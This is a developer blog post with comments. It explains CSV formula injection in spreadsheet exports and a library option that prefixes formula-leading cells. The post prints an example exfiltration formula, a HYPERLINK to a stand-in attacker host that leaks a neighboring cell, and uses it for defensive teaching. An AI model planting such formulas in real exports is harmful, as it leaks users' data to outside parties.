Myroslav Martsin

Posted on Jun 18

The CSV export vulnerability you probably have (and a one-line fix)

#security #webdev #javascript #typescript

You let users export data to CSV. They open it in a spreadsheet. A cell runs a formula. That is CSV injection, and most export endpoints have it.

Spreadsheet applications treat any cell starting with =, +, -, @, a tab, or a carriage return as a formula. An attacker-controlled name like =HYPERLINK("http://evil.com?x="&A1) is then evaluated on open and builds a link that leaks a neighboring cell when it is clicked. The CSV is perfectly valid, so escaping commas does nothing here.
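As a rough illustration of that rule, here is a minimal sketch of a check for formula-leading values. The name isFormulaLeading is hypothetical and not part of any library; the character list is simply the one given above.

```typescript
// Matches a value whose first character is one of the triggers listed above:
// =, +, -, @, tab, or carriage return.
const FORMULA_TRIGGER = /^[=+\-@\t\r]/;

// Hypothetical helper (not from any library): true if a spreadsheet
// would likely read this cell value as a formula.
function isFormulaLeading(value: string): boolean {
  return FORMULA_TRIGGER.test(value);
}

isFormulaLeading('=HYPERLINK("http://evil.com?x="&A1)'); // true
isFormulaLeading('Alice');                                // false
isFormulaLeading('-5 degrees');                           // true: a leading minus counts too
```

Note that ordinary values such as a name or a note starting with a minus sign also match, which is why the fix is to neutralize the cell rather than reject it.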

The fix is to prefix formula-leading cells. csv-pipe has it built in:

import { stringify } from 'csv-pipe';

const rows = [{ name: '=HYPERLINK("http://evil.com?x="&A1)', note: 'attacker' }];

stringify(rows, { sanitizeFormulas: true });
// name,note
// "'=HYPERLINK(""http://evil.com?x=""&A1)",attacker

The leading ' makes the spreadsheet show the cell as text instead of running it (the doubled quotes are normal CSV escaping). It only touches string and array cells; numbers and dates are left alone.
Turn it on for any export of untrusted data.
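To make the two steps visible, here is a hand-rolled sketch of what such a guard does: prefix first, then apply ordinary CSV quoting. The functions neutralize and escapeCsvField are hypothetical stand-ins written for this example; csv-pipe's internals may differ, and this sketch covers string cells only, not arrays.

```typescript
// Illustration only; not csv-pipe's implementation.
const FORMULA_LEAD = /^[=+\-@\t\r]/;

// Step 1: prefix formula-leading strings with an apostrophe.
// Non-string cells (numbers, dates, ...) are returned unchanged.
function neutralize(cell: unknown): unknown {
  if (typeof cell === 'string' && FORMULA_LEAD.test(cell)) {
    return "'" + cell;
  }
  return cell;
}

// Step 2: ordinary CSV quoting. Wrap the field in double quotes and double
// any embedded quotes when it contains a quote, comma, or line break.
function escapeCsvField(cell: unknown): string {
  const text = String(cell);
  return /[",\r\n]/.test(text) ? '"' + text.replace(/"/g, '""') + '"' : text;
}

const field = escapeCsvField(neutralize('=HYPERLINK("http://evil.com?x="&A1)'));
// field is: "'=HYPERLINK(""http://evil.com?x=""&A1)"
```

The order matters: the apostrophe goes inside the quoted field, so the spreadsheet sees it as the first character of the cell after CSV unquoting.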

csv-pipe is a small, zero-dependency CSV library that both encodes and parses, typed and streaming in both directions, with this guard built in.

Top comments (9)

Joel Horvath • Jun 18

Yeah, this is one of those “still bites people in 2026” issues.
The key point is simple but easy to miss: CSV isn’t a data format in Excel’s world—it’s a command vector.
The sanitizeFormulas: true approach is basically the right default.
One question though: do you think teams should always sanitize, or only for exports that are explicitly meant for Excel/Sheets use?

Myroslav Martsin • Jun 18

Great framing, "command vector" nails it.

I would not gate it on "is this for Excel." You rarely control the consumer. A "data pipeline" CSV still gets double-clicked by some analyst. So the real axis is "could untrusted data reach a spreadsheet," and usually you cannot rule that out.

The asymmetry settles it: the cost of sanitizing is a stray leading apostrophe, while the cost of not sanitizing is code execution or data exfiltration. So default to on for any untrusted, human-reachable export.

Only skip it for strict machine-to-machine exports where values must round-trip exactly. When in doubt, sanitize.

Joel Horvath • Jun 18

Got it, Myroslav.
Your post is great, and I can see you’re very experienced. Thanks again for sharing it.
I’ve been thinking about an idea for a while, and I’m looking for someone with your level of expertise to help bring it to life.
If you’re interested, let me know and we can discuss it further.

Joel Horvath • Jun 18

Myroslav.
Chatting here is not convenient. Please share your email so we can talk.

Ofri Peretz • Jun 20

what makes this one nasty is that it's a perfectly valid csv, so the exploit sails through every 'is it well-formed' check and escaping commas does nothing — exactly as you said. sanitizing at the serializer is the right layer. the bit i'd add from the security side: that guard rots the moment someone hand-rolls a new export path and forgets it, so i also pin it with a lint rule that flags raw csv writes of untrusted input. since csv-pipe parses both directions, does the leading quote survive a round-trip or does parse() strip it back to the original value?

Myroslav Martsin • Jun 20 • Edited

Good call on the lint rule, that's the real failure mode. The flag only helps on paths someone remembers, so I'd route untrusted exports through one helper that turns it on and have the linter ban raw CSV writes. Fix it in one place instead of every call site.
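A minimal sketch of that single helper, for illustration. The serializer is passed in so the example stays self-contained; in real code you would pass csv-pipe's stringify. The names CsvRow, Stringify, and makeUntrustedExporter are hypothetical, and the Stringify type is an assumption based only on how stringify is called in the post.

```typescript
// Assumed shape of the serializer, based on the call in the post:
// stringify(rows, { sanitizeFormulas: true }).
type CsvRow = Record<string, unknown>;
type Stringify = (rows: CsvRow[], options: { sanitizeFormulas: boolean }) => string;

// Hypothetical helper: builds the one export function call sites may use.
// The guard is hard-coded, so no caller can forget or disable it.
function makeUntrustedExporter(stringify: Stringify): (rows: CsvRow[]) => string {
  return (rows) => stringify(rows, { sanitizeFormulas: true });
}

// Intended usage (not executed here):
//   import { stringify } from 'csv-pipe';
//   const exportUntrustedCsv = makeUntrustedExporter(stringify);
//   const csv = exportUntrustedCsv(rows);
```

The lint rule then only has to ban direct serializer imports outside the module that defines this helper.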

On the round-trip: the quote sticks. parse() doesn't strip it, so =1+1 goes out as '=1+1 and reads back as '=1+1, not =1+1. It's encode-side only by design. To the parser ' is just a normal character (the CSV quote is "), so it can't tell whether you added it or the value really started with '. Auto-stripping would wreck real data.

So only sanitize what's headed for a spreadsheet, not what you need back exactly. And if you ever strip it on re-import, only do it when you know the whole column was sanitized.
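If you do strip on re-import, a sketch along these lines keeps it limited to columns you know were sanitized. This is a hypothetical helper, not something csv-pipe provides, and it assumes the parsed rows are plain objects of strings.

```typescript
type ParsedRow = Record<string, string>;

// An apostrophe followed by a formula trigger: the shape the guard produces.
const SANITIZED_LEAD = /^'[=+\-@\t\r]/;

// Hypothetical re-import helper. `sanitizedColumns` lists the columns the
// caller KNOWS went through the guard on export; other columns are untouched.
// Returns new row objects and does not mutate the input.
function stripSanitizerPrefix(rows: ParsedRow[], sanitizedColumns: string[]): ParsedRow[] {
  return rows.map((row) => {
    const restored: ParsedRow = { ...row };
    for (const column of sanitizedColumns) {
      const value = restored[column];
      if (value !== undefined && SANITIZED_LEAD.test(value)) {
        restored[column] = value.slice(1); // drop only the leading apostrophe
      }
    }
    return restored;
  });
}
```

Even this is not lossless: a value that genuinely started with '= before export is indistinguishable from a sanitized one and would lose its apostrophe, which is the ambiguity described above.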

leob • Jun 19

Good to be aware of this!

Mudassir Khan • Jun 21

the 'can't control the consumer' argument is the strongest reason to default on — you don't know if a 'data pipeline csv' gets double clicked by an analyst six months later.

the lint rule point is good, but in TypeScript you can push the enforcement into the type system: a branded type like SanitizedRow vs UnsanitizedRow means the serializer's return type is incompatible with an export endpoint that expects sanitized data. the compiler catches the forgotten path before the linter does, and refactors can't quietly break it.

does the library expose the sanitized output as a distinct type, or is the guarantee purely runtime?

Myroslav Martsin • Jun 22

Agreed on default on. The analyst who double clicks it six months later is exactly why "is this for Excel" is the wrong question.

On pushing it into the type system: that's the right call, and the compiler beating the linter is the real win since a refactor can't quietly undo it. Honest answer though: today it's purely runtime. stringify returns a plain string whether or not sanitizeFormulas is set; there's no branded type.

One nuance: sanitization here is a property of the output, not the input rows. The same rows produce sanitized or raw CSV depending on the flag, so a SanitizedRow brand doesn't quite fit. The natural place is the result: stringify with the guard returning a branded SanitizedCsv (string & { __sanitized: true }) that your response helper requires. Same end-to-end, refactor-proof guarantee, just anchored on the output. It's a clean addition, happy to take an issue if you want it.
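Until something like that exists in the library, the same idea can be approximated in user code. The following is only a sketch: SanitizedCsv follows the shape described above, while stringifySanitized, csvResponseBody, and the CsvStringify type are hypothetical names, and the serializer is injected so the example stays self-contained.

```typescript
// Branded output type: a string the compiler treats as distinct from plain strings.
type SanitizedCsv = string & { __sanitized: true };

// Assumed serializer shape, based on how stringify is called in the post.
type BrandRow = Record<string, unknown>;
type CsvStringify = (rows: BrandRow[], options: { sanitizeFormulas: boolean }) => string;

// Hypothetical wrapper: the only place allowed to mint the brand.
// The cast is safe only because the guard is hard-coded right here.
function stringifySanitized(stringify: CsvStringify, rows: BrandRow[]): SanitizedCsv {
  return stringify(rows, { sanitizeFormulas: true }) as SanitizedCsv;
}

// Hypothetical response helper: accepts only branded output.
function csvResponseBody(csv: SanitizedCsv): { contentType: string; body: string } {
  return { contentType: 'text/csv', body: csv };
}

// csvResponseBody('name,note\n=1+1,x');
// ^ does not compile: a plain string is not assignable to SanitizedCsv.
```

The brand exists only at compile time, so an explicit cast elsewhere can still forge it; the guarantee is that nobody bypasses the guard by accident.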